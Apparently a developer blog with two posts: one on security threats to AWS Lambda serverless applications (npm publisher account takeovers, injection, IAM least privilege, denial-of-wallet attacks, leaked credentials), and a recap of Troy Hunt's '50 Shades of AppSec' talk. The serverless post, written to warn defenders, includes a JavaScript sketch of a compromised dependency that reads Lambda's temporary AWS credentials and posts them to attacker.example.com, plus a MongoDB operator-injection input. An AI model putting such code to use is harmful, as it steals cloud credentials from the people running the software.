Many-faced threats to Serverless security

Threats to the security of our serverless applications take many forms: some are the same old foes we have faced before; some are new; and some have taken on new forms in the serverless world.

As we adopt the serverless paradigm for building cloud-hosted applications, we delegate even more of the operational responsibilities to our cloud providers. When you build a serverless architecture around AWS Lambda, you no longer have to configure AMIs, patch the OS, or install daemons to collect and distribute logs and metrics for your application. AWS takes care of all of that for you.

What does this mean for the Shared Responsibility Model that has long been the cornerstone of security in the AWS cloud?

Protection from attacks against the OS

AWS takes over the responsibility for maintaining the host OS as part of its core competency, alleviating you of the rigorous task of applying all the latest security patches – something most of us just don’t do a good enough job of because it’s not our primary focus.

In doing so, it protects us from attacks against known vulnerabilities in the OS and prevents attacks such as WannaCry.

And by removing long-lived servers from the picture, we also remove the threat posed by compromised servers that linger in our environment for a long time.

WannaCry happened because the MS17-010 security patch was not applied to the affected hosts.

However, it is still our responsibility to patch our application and address vulnerabilities that exist in our code and our dependencies.

OWASP top 10 is still as relevant as ever

Aside from a few reclassifications, the OWASP top 10 list has largely stayed the same in 7 years.

A glance at the OWASP top 10 list for 2017 shows us some familiar threats – Injection, Cross-Site Scripting, Sensitive Data Exposure, and so on.

A9 – Components with Known Vulnerabilities

When the folks at Snyk looked at a dataset of 1792 data breaches in 2016 they found that 12 of the top 50 data breaches were caused by applications using components with known vulnerabilities.

Furthermore, 77% of the top 5000 URLs from Alexa include at least one vulnerable library. This is less surprising than it first sounds when you consider that some of the most popular front-end JS frameworks – e.g. jQuery, Angular and React – have all had known vulnerabilities. It highlights the need to continuously update and patch your dependencies.

However, unlike OS patches, which are standalone, trusted and easy to apply, security updates to these 3rd-party dependencies are usually bundled with feature and API changes that need to be integrated and tested. This makes our lives as developers difficult, and it’s yet another thing we have to do when we’re already working overtime to ship new features.

And then there’s the matter of transitive dependencies, and boy, there are so many of them… If these transitive dependencies have vulnerabilities, then you too are vulnerable through your direct dependencies.

https://david-dm.org/request/request?view=tree

Finding vulnerabilities in our dependencies is hard work and requires constant diligence, which is why services such as Snyk are so useful. Snyk even comes with built-in integration with Lambda too!

Attacks against NPM publishers

What if the author/publisher of your 3rd party dependency is not who you think they are?

Just a few weeks ago, a security bounty hunter posted this amazing thread on how he managed to gain direct push rights to 14% of NPM packages. The list of affected packages includes some big names too: debug, request, react, co, express, moment, gulp, mongoose, mysql, bower, browserify, electron, jasmine, cheerio, modernizr, redux and many more. In total, these packages account for 20% of the total number of monthly downloads from NPM.

Let that sink in for a moment.

Did he use highly sophisticated methods to circumvent NPM’s security?

Nope, it was a combination of brute force and known account & credential leaks from a number of sources, including GitHub. In other words, anyone could have pulled this off with very little research.

It’s hard not to feel let down by these package authors when so many display such a cavalier attitude towards securing access to their NPM accounts. I feel my trust in these 3rd-party dependencies has been betrayed.

662 users had password «123456», 174 – «123», 124 – «password».

1409 users (1%) used their username as their password, in its original form, without any modifications.

11% of users reused their leaked passwords: 10.6% – directly, and 0.7% – with very minor modifications.

As I demonstrated in my recent talk on Serverless security, one can easily steal temporary AWS credentials from affected Lambda functions (or EC2-hosted Node.js applications) with a few lines of code.
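To illustrate just how few lines it takes, here’s a minimal sketch of the idea (the exfiltration endpoint is, of course, hypothetical): Lambda exposes the function’s temporary credentials as environment variables, so any code you load – including a compromised dependency – can read them and ship them off.

```js
// Minimal sketch of the attack: a malicious (transitive) dependency reads the function's
// temporary credentials from the environment and posts them to an attacker-controlled
// endpoint. The endpoint is hypothetical; the environment variables are standard Lambda.
const https = require('https');

const stolen = JSON.stringify({
  accessKeyId: process.env.AWS_ACCESS_KEY_ID,
  secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY,
  sessionToken: process.env.AWS_SESSION_TOKEN
});

const req = https.request({
  hostname: 'attacker.example.com',   // hypothetical exfiltration endpoint
  path: '/collect',
  method: 'POST',
  headers: { 'Content-Type': 'application/json' }
});
req.end(stolen);
```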

Imagine then, a scenario where an attacker had managed to gain push rights to 14% of all NPM packages. He could publish a patch update to all these packages and steal AWS credentials at a massive scale.

The stakes are high; this is quite possibly the biggest security threat we face in the serverless world, and it’s equally threatening to applications hosted in containers or VMs.

The problems and risks with package management are not specific to the Node.js ecosystem. I have spent most of my career working with .NET technologies and am now working with Scala at Space Ape Games, and package management has been a challenge everywhere. Whether you’re talking about NuGet, Maven, or any other package repository, you’re always at risk if the authors of your dependencies do not exercise the same due diligence in securing their accounts as they would their own applications.

Or, perhaps they do…

A1 – Injection & A3 – XSS

SQL injection and other forms of injection attacks are still possible in the serverless world, as are cross-site scripting attacks.

Even if you’re using NoSQL databases, you might not be exempt from injection attacks either. MongoDB, for instance, exposes a number of attack vectors through its query APIs.

Arguably DynamoDB’s API makes it hard (at least I haven’t heard of a way yet) for an attacker to orchestrate an injection attack, but you’re still open to other forms of exploits – e.g. XSS, or leaked credentials which grant an attacker access to your DynamoDB tables.

Nonetheless, you should always sanitize user inputs, as well as the output from your Lambda functions.
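To make the MongoDB case concrete, here’s a hedged sketch of the classic operator-injection problem and a simple input guard – the collection and field names are made up for the example (and plaintext passwords are used only to keep the illustration short):

```js
// Classic MongoDB operator injection: if the request body is parsed JSON, an attacker can
// send { "password": { "$gt": "" } } and the query will match regardless of the password.
// Collection and field names are made up; don't store plaintext passwords in practice.
async function login(db, body) {
  // vulnerable version:
  // return db.collection('users').findOne({ user: body.user, password: body.password });

  // minimal guard: only accept primitive strings for anything that ends up in the query
  if (typeof body.user !== 'string' || typeof body.password !== 'string') {
    throw new Error('invalid input');
  }
  return db.collection('users').findOne({ user: body.user, password: body.password });
}
```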

A6 – Sensitive Data Exposure

Along with servers, web frameworks also disappear when you migrate to the serverless paradigm. These web frameworks have served us well for many years, but they also handed us a loaded gun we could shoot ourselves in the foot with.

As Troy Hunt demonstrated in a recent talk at LDNUG, we can expose all kinds of sensitive data by accidentally leaving directory listing options ON – from web.config files containing credentials (at 35:28) to SQL backup files (at 1:17:28)!

With API Gateway and Lambda, accidental exposures like this become very unlikely – directory listing is a “feature” you’d have to implement yourself. It forces you to make very conscious decisions about when to support directory listing and the answer is probably never.

IAM

If your Lambda functions are compromised, then the next line of defence is to restrict what these compromised functions can do.

This is why you need to apply the Least Privilege Principle when configuring Lambda permissions.

In the Serverless framework, the default behaviour is to use the same IAM role for all functions in the service.

However, the serverless.yml spec allows you to specify a different IAM role per function, although as you can see from the examples it involves a lot more development effort and (from my experience) adds enough friction that almost no one does it…
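To make “least privilege” concrete, here’s a rough sketch of the kind of policy you’d scope to a single function – in this case, a hypothetical function that only ever reads one DynamoDB table (the table name, region and account ID are placeholders):

```js
// A minimal, least-privilege policy document for a hypothetical function that only reads
// one DynamoDB table. Region, account ID and table name are placeholders.
const readOrdersTableOnly = {
  Version: '2012-10-17',
  Statement: [
    {
      Effect: 'Allow',
      Action: ['dynamodb:GetItem', 'dynamodb:Query'],
      Resource: 'arn:aws:dynamodb:us-east-1:123456789012:table/orders'
    }
  ]
};

module.exports = readOrdersTableOnly;
```

A compromised function with a policy like this can read the orders table and nothing else – a far smaller blast radius than a shared, catch-all role.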

Apply per-function IAM policies.

IAM policy not versioned with Lambda

A shortcoming with the current Lambda + IAM configuration is that IAM policies are not versioned along with the Lambda function.

In the scenario where you have multiple versions of the same function in active use (perhaps with different aliases), then it becomes problematic to add or remove permissions:

  • adding a new permission to a new version of the function allows old versions of the function additional access that they don’t require (and poses a vulnerability)
  • removing an existing permission from a new version of the function can break old versions of the function that still require that permission

Since the 1.0 release of the Serverless framework this has become less of a problem, as it no longer uses aliases for stages – instead, each stage is deployed as a separate function, e.g.

  • service-function-dev
  • service-function-staging
  • service-function-prod

which means it’s far less likely that you’ll need to have multiple versions of the same function in active use.

I have also found (from personal experience) that account-level isolation can help mitigate the problems of adding/removing permissions. Crucially, the isolation also helps compartmentalise security breaches – e.g. a compromised function running in a non-production account cannot be used to cause harm in the production account and impact your users.

We can apply the same idea of bulkheads (which has been popularised in the microservices world by Michael Nygard’s “Release It”) and compartmentalise security breaches at an account level.

Delete unused functions

One of the benefits of the serverless paradigm is that you don’t pay for functions when they’re not used.

The flip side of this property is that you have less incentive to remove unused functions, since they don’t show up on your bill. However, these functions still count as attack surface – even more so than actively used functions, because they’re less likely to be updated and patched. Over time, these unused functions can become a hotbed of components with known vulnerabilities that attackers can exploit.

Lambda’s documentation also cites this as one of its best practices.

Delete old Lambda functions that you are no longer using.
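If you want to audit this periodically, here’s a rough sketch (using the Node.js AWS SDK) that flags functions that haven’t been modified in 90 days – the threshold is arbitrary, and “not recently modified” is only a proxy for “unused”, so verify before deleting anything:

```js
// Rough sketch: flag Lambda functions that haven't been modified in 90 days.
// "Not recently modified" is only a proxy for "unused" - verify before deleting.
const AWS = require('aws-sdk');
const lambda = new AWS.Lambda();

async function findStaleFunctions(days = 90) {
  const cutoff = Date.now() - days * 24 * 60 * 60 * 1000;
  const stale = [];
  let marker;

  do {
    const page = await lambda.listFunctions({ Marker: marker }).promise();
    for (const fn of page.Functions) {
      if (new Date(fn.LastModified).getTime() < cutoff) {
        stale.push(fn.FunctionName);
      }
    }
    marker = page.NextMarker;
  } while (marker);

  return stale;
}

findStaleFunctions().then(names => console.log('candidates for deletion:', names));
```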

The changing face of DoS attacks

With AWS Lambda you are far more likely to scale your way out of a DoS attack. However, scaling your serverless architecture aggressively to fight a DoS attack with brute force has a significant cost implication.

No wonder people started calling DoS attacks against serverless applications Denial of Wallet (DoW) attacks!

“But you can just throttle the no. of concurrent invocations, right?”

Sure, but then the attacker only has to hit that throttle to deny service to your legitimate users – you end up with a DoS problem instead… it’s a lose-lose situation.

AWS recently introduced AWS Shield, but at the time of writing the cost protection (available only if you pay a monthly flat fee for AWS Shield Advanced) does not cover Lambda costs incurred during a DoS attack.

For a monthly flat fee, AWS Shield Advanced gives you cost protection in the event of a DoS attack, but that protection does not cover Lambda yet.

Also, Lambda has an at-least-once invocation policy. According to the folks at SunGard, this can result in up to 3 (successful) invocations. From the article, the reported rate of multiple invocations is extremely low – 0.02% – but one wonders if the rate is tied to the load and might manifest itself at a much higher rate during a DoS attack.

Taken from the “Run, Lambda, Run” article mentioned above.

Furthermore, you need to consider how Lambda retries failed invocations from asynchronous event sources – e.g. S3, SNS, SES, CloudWatch Events, etc. Officially, these invocations are retried twice before they’re sent to the assigned DLQ (if any).
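If you haven’t assigned a DLQ yet, here’s a rough sketch of doing so with the Node.js AWS SDK, using an SNS topic as the target (the function name and topic ARN are placeholders; the Serverless framework lets you configure the same thing declaratively):

```js
// Rough sketch: assign a dead letter queue (an SNS topic here) to a function, so failed
// async invocations end up somewhere you can inspect and replay.
// The function name and topic ARN are placeholders.
const AWS = require('aws-sdk');
const lambda = new AWS.Lambda();

lambda.updateFunctionConfiguration({
  FunctionName: 'my-service-dev-processUpload',
  DeadLetterConfig: {
    TargetArn: 'arn:aws:sns:us-east-1:123456789012:processUpload-dlq'
  }
}).promise()
  .then(() => console.log('DLQ configured'))
  .catch(console.error);
```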

However, an analysis by the OpsGenie guys showed that the no. of retries is not carved in stone and can go as high as 6 before the invocation is sent to the DLQ.

If the DoS attacker is able to trigger failed async invocations (perhaps by uploading files to S3 that will cause your function to throw an exception when it attempts to process them), then they can significantly magnify the impact of their attack.

All of this adds up to the potential for the actual no. of Lambda invocations to explode during a DoS attack. As we discussed earlier, whilst your infrastructure might be able to handle the attack, can your wallet stretch to the same extent? Should you allow it to?

Securing external data

Just a handful of the places you could be storing state outside of your stateless Lambda function.

Due to the ephemeral nature of Lambda functions, chances are all of your functions are stateless. More than ever, state is stored in external systems, and we need to secure it both at rest and in transit.

Communication with all AWS services is via HTTPS, and every request needs to be signed and authenticated. A handful of AWS services also offer server-side encryption for your data at rest – S3, RDS and Kinesis streams spring to mind – and Lambda has built-in integration with KMS to encrypt your functions’ environment variables.

The same diligence needs to be applied when storing sensitive data in services/DBs that do not offer built-in encryption – e.g. DynamoDB, Elasticsearch, etc. – to ensure it’s protected at rest. In the event of a data breach, this provides another layer of protection for our users’ data.
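As an example of what that diligence might look like, here’s a hedged sketch of encrypting a sensitive attribute with KMS before writing it to DynamoDB – the key alias, table and attribute names are placeholders, and for payloads over 4 KB you’d switch to envelope encryption with a data key:

```js
// Hedged sketch: encrypt a sensitive attribute with KMS before writing to DynamoDB.
// Key alias, table name and attribute names are placeholders. KMS encrypt is limited to
// small payloads (4 KB) - use envelope encryption with generateDataKey for anything bigger.
const AWS = require('aws-sdk');
const kms = new AWS.KMS();
const dynamo = new AWS.DynamoDB.DocumentClient();

async function saveUser(userId, ssn) {
  const { CiphertextBlob } = await kms.encrypt({
    KeyId: 'alias/user-data',          // placeholder CMK alias
    Plaintext: ssn
  }).promise();

  await dynamo.put({
    TableName: 'users',                // placeholder table
    Item: { userId, ssn: CiphertextBlob.toString('base64') }
  }).promise();
}
```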

We owe our users that much.

Use secure transport when transmitting data to and from services (both external and internal ones). If you’re building APIs with API Gateway and Lambda then you’re forced to use HTTPS by default, which is a good thing. However, API Gateway is always publicly accessible and you need to take the necessary precautions to secure access to internal APIs.

You can use API keys, but I think it’s better to use IAM roles. IAM gives you fine-grained control over who can invoke which actions on which resources. Also, using IAM roles spares you from awkward conversations like this:

“It’s X’s last day, he probably has our API keys on his laptop somewhere, should we rotate the API keys just in case?”

“mm.. that’d be a lot of work, X is trustworthy, he’s not gonna do anything.”

“ok… if you say so… (secretly pray X doesn’t lose his laptop or develop a belated grudge against the company)”

Fortunately, both can be easily configured using the Serverless framework.
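For completeness, here’s a rough sketch of what the caller’s side of an IAM-protected endpoint looks like: the request has to be signed with SigV4. I’m using the aws4 npm package for the signing; the host and path are placeholders, and inside Lambda or EC2 the credentials are picked up from the environment automatically.

```js
// Rough sketch: invoke an IAM-protected API Gateway endpoint by SigV4-signing the request.
// Uses the aws4 npm package for signing; the host and path are placeholders.
const https = require('https');
const aws4 = require('aws4');

const opts = {
  host: 'abc123.execute-api.us-east-1.amazonaws.com',  // placeholder API Gateway host
  path: '/dev/internal/orders',
  method: 'GET',
  service: 'execute-api',
  region: 'us-east-1'
};

aws4.sign(opts);  // adds the Authorization, X-Amz-Date (and session token) headers

https.request(opts, res => {
  console.log('status:', res.statusCode);
}).end();
```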

Leaked credentials

Don’t become an unwilling bitcoin miner.

The internet is full of horror stories of developers racking up a massive AWS bill after their leaked credentials were used by cyber-criminals to mine bitcoins. For every such story, many more victims will have been affected but chose to stay silent (for the same reason many security breaches are not announced publicly – big companies do not want to appear incompetent).

Even within my small social circle (*sobs) I have heard of 2 such incidents; neither was made public and both resulted in over $100k worth of damages. Fortunately, in both cases AWS agreed to cover the cost.

I know for a fact that AWS actively scans public GitHub repos for active AWS credentials and tries to alert you as soon as possible. But as some of the above stories mention, even if your credentials are leaked for only a brief window of time, they will not escape the watchful gaze of attackers (plus, they still exist in the git commit history unless you rewrite that too – best to deactivate the credentials if possible).

A good approach to prevent AWS credential leaks is to use git pre-commit hooks as outlined by this post.
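The post linked above uses a ready-made hook, but the idea is simple enough to sketch: before each commit, scan the staged diff for anything that looks like an AWS access key and abort if something matches. This is only an illustration – dedicated tools such as git-secrets are more thorough.

```js
#!/usr/bin/env node
// Minimal sketch of a pre-commit check: block the commit if the staged diff contains
// anything that looks like an AWS access key ID or a hard-coded secret key assignment.
const { execSync } = require('child_process');

const staged = execSync('git diff --cached', { encoding: 'utf8' });

const suspicious = [
  /AKIA[0-9A-Z]{16}/,                                            // access key IDs
  /aws_secret_access_key\s*[:=]\s*['"][A-Za-z0-9/+=]{40}['"]/i   // secret key assignments
];

if (suspicious.some(re => re.test(staged))) {
  console.error('Possible AWS credentials found in staged changes - commit aborted.');
  process.exit(1);
}
```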

Conclusions

We looked at a number of security threats to our serverless applications in this post; many of them are the same threats that have plagued the software industry for years. All of the OWASP top 10 still apply to us, including SQL, NoSQL and other forms of injection attacks.

Leaked AWS credentials remain a major issue and can potentially impact any organisation that uses AWS. Whilst there are quite a few publicly reported incidents, I have a strong feeling that the actual no. of incidents is much, much higher.

We are still responsible for securing our users’ data both at rest and in transit. API Gateway is always publicly accessible, so we need to take the necessary precautions to secure access to our internal APIs, preferably with IAM roles. IAM offers fine-grained control over who can invoke which actions on your API resources, and makes it easy to manage access when employees come and go.

On a positive note, having AWS take over the responsibility for the security of the host OS gives us a no. of security benefits:

  • protection against OS attacks because AWS can do a much better job of patching known vulnerabilities in the OS
  • the host OS is ephemeral, which means no long-lived compromised servers
  • it’s much harder to accidentally leave sensitive data exposed by forgetting to turn off directory listing options in a web framework – because you no longer need such web frameworks!

DoS attacks have taken on a new form in the serverless world. Whilst you’re probably able to scale your way out of an attack, it’ll still hurt you in the wallet, which is why DoS attacks have become known in the serverless world as Denial of Wallet attacks. Lambda costs incurred during a DoS attack are not covered by AWS Shield Advanced at the time of writing, but hopefully they will be in the near future.

Meanwhile, some new attack surfaces have emerged with AWS Lambda:

  • functions are often given too many permissions because they’re not given individual IAM policies tailored to their needs; a compromised function can therefore do more harm than it otherwise might
  • unused functions are often left around for a long time as there is no cost associated with them, but attackers might be able to exploit them, especially as they’re not actively maintained and are therefore likely to contain known vulnerabilities

Above all, the most worrisome threat for me is attacks against the package authors themselves. It has been shown that many authors do not take the security of their accounts seriously, and in doing so they endanger themselves as well as the rest of the community that depends on them. It’s impossible to guard against such attacks, and they erode one of the strongest aspects of any software ecosystem – the community behind it.

Once again, people have proven to be the weakest link in the security chain.

Slides for my serverless security talk

NDC Oslo 15 – Takeaways from “50 Shades of AppSec”

This year’s NDC Oslo had a strong security theme throughout, and one of Troy Hunt’s talks – 50 Shades of AppSec – was one of the top-rated talks at the conference based on attendee feedback.

Sadly I missed the talk whilst at the conference, but having just watched it on Vimeo I’m left amused and scared in equal measure, and wondering if I should ever trust anyone with my personal information again…

 

Troy started by talking about the democratisation of hacking, that anybody can become a hacker nowadays, e.g.:

  • a 5-year-old boy who hacked the Xbox;
  • Chrome extensions such as Bishop that scan websites for vulnerabilities as you browse;
  • online tutorials on how to find a site with SQL Injection risk and paste a link into tools like Havij to download its data;
  • or you can go to hackerlist and hire someone to do the hacking for you.

The fact that hacking is so accessible these days has given rise to the culture of hacktivism.


When it comes to hacktivism, besides the kids (or young adults) you keep hearing about on the news, there’s a darker side to the story – criminal hacking.

Criminals are now taking blackmail and extortion into the digital age, demanding bitcoins to:

  • remove your (supposedly compromised) data from the internet;
  • refrain from exposing more (supposedly compromised) data;
  • stop compromising a business’ reputation and online presence.

And it’s not just your computer that’s at risk – routers can be hacked to initiate spoofing attacks too. This is why encryption and HTTPS are so important.

 

The good news is that even smart criminals are still fallible and sometimes they get tripped up by the simplest things.

For example, Ross Ulbricht (creator of Silk Road) was caught partly because he used his real name on Stack Overflow, where he posted a question on how to connect to a hidden Tor site using curl.

Or how Jihadi John was identified because he used his UK student ID to qualify for a discount on a piece of web development software that he was trying to purchase from a computer in Syria, with a Syrian IP address.

 

Are we developers making it too easy for criminals? Judging by the horror examples (which, ok, might be a bit extreme) Troy demonstrated, perhaps we are.

From the horrifyingly obvious…


to perhaps something a bit more subtle (anyone who knew your email and DOB could reset your Betfair password, until they fixed it after Troy wrote a post about it)…


 

Sometimes we also make it too easy for our users to be insecure. Again, from the obvious…


To something more subtle (the following makes you wonder if passwords are visible in plain text to a human operator who is offended by certain words)…


 

Notice that a recurring theme seems to be this tension between security and usability – e.g. how to make login and password recovery simpler.

 

Perhaps the problem is that we’re not educating developers correctly.

For instance, how is it that in 2015 we’re still teaching developers to do password reset like this and leaving them wide open to SQL Injection attacks?
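(The offending slide isn’t reproduced here, but the vulnerable pattern is the familiar string-concatenated query; a parameterised query – sketched below with the Node.js mysql library, with made-up table and column names – keeps user input out of the SQL text entirely.)

```js
// Vulnerable pattern: building the SQL statement by string concatenation.
// const sql = "UPDATE users SET password = '" + newPassword + "' WHERE email = '" + email + "'";

// Parameterised query (Node.js mysql library; table and column names are made up).
const mysql = require('mysql');
const connection = mysql.createConnection({ /* connection details */ });

const email = 'user@example.com';       // placeholder - from the validated request
const newPasswordHash = 'bcrypt-hash';  // placeholder - hash the password, don't store plaintext

connection.query(
  'UPDATE users SET password = ? WHERE email = ?',
  [newPasswordHash, email],
  (err, results) => {
    if (err) throw err;
    console.log('rows changed:', results.changedRows);
    connection.end();
  }
);
```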


or that base64 encoding and ROT13 (or ROT5 in this case…) are a sufficient form of encryption…


 

But it’s not just developers who are at fault; sometimes even security auditors are accountable too.


 

And of course, let’s not forget the users.

For example, you might not want to have your passwords broadcast on national TV…


 

But we are also at fault for giving mixed messages to our users.

For example, why would a QR code scanner need access to your calendar and contacts? But with the design of this UI, all the user will see is the big green ACCEPT button that stands between them and getting done what they need to do.


And social media is particularly bad when it comes to giving confusing messages.

Sometimes they aren’t even trying…


other times they make up things such as “security certificates” and throw scary words like “brute force attack” at users (how allowing people to paste passwords into the text box leaves you open to one is beyond me)…


and sometimes we leave users vulnerable to criminals (e.g. what if a criminal were to look for similar responses on EE’s Twitter account and then contact those users from a legitimate-looking account such as @EE_CustomerService, complete with the same EE logo)…


 

And you can’t talk about security without talking about governments and surveillance (and Bruce Schneier talked about this in great detail in his opening keynote too).

For example, the US government has technology that can wiretap your VGA cable and see exactly what’s on your monitor.


Snowden’s leaks also showed that the US government was looking at Google’s infrastructure for opportunities to siphon up all your data.


And the UK’s prime minister, David Cameron, recently called for an end to any form of digital communication that cannot be intercepted by the government’s intelligence agencies!


 

Finally, appsec gets really interesting when it intersects with the physical world.

For example, when we blindly apply practices from the digital world to the physical world, we sometimes forget simple truths about this world – such as the fact that letters are delivered in envelopes with large windows on them…


and the physical world has a way of circumventing security measures designed for the digital world…


 

As the digital and physical worlds become ever more intertwined through IoT, security is going to get very interesting.

For example, a vulnerability was found in LIFX light bulbs which leaked credentials for the wireless network, allowing an attacker to compromise your home network.

Whilst LIFX has since fixed the vulnerability, the concern remains that any wifi-connected device is ultimately vulnerable and may be hacked.

How do we educate developers to defend against these attacks when so many of them are at startups in a hurry to hit the market just to survive? How do we detect these vulnerabilities and investigate them? If your network were compromised, would you think to look at your light bulb as the entry point of the attack?

There are many questions we don’t even know to ask yet…

As for the users, if they’re struggling with keeping their passwords under control, how do we begin to educate them on the dangers they’re exposing themselves to when they purchase these “smart” house appliances?

 

For anyone who has played Watch Dogs, remember at the end of the game Aiden Pearce kills Lucky Quinn by hacking his pacemaker? This is the reality of the world we are heading towards, and these kinds of risks will be (are?) very real and will impact all of us. Based on the evidence Troy has shown, it’s a world that many of us are not ready for…

 

 

Links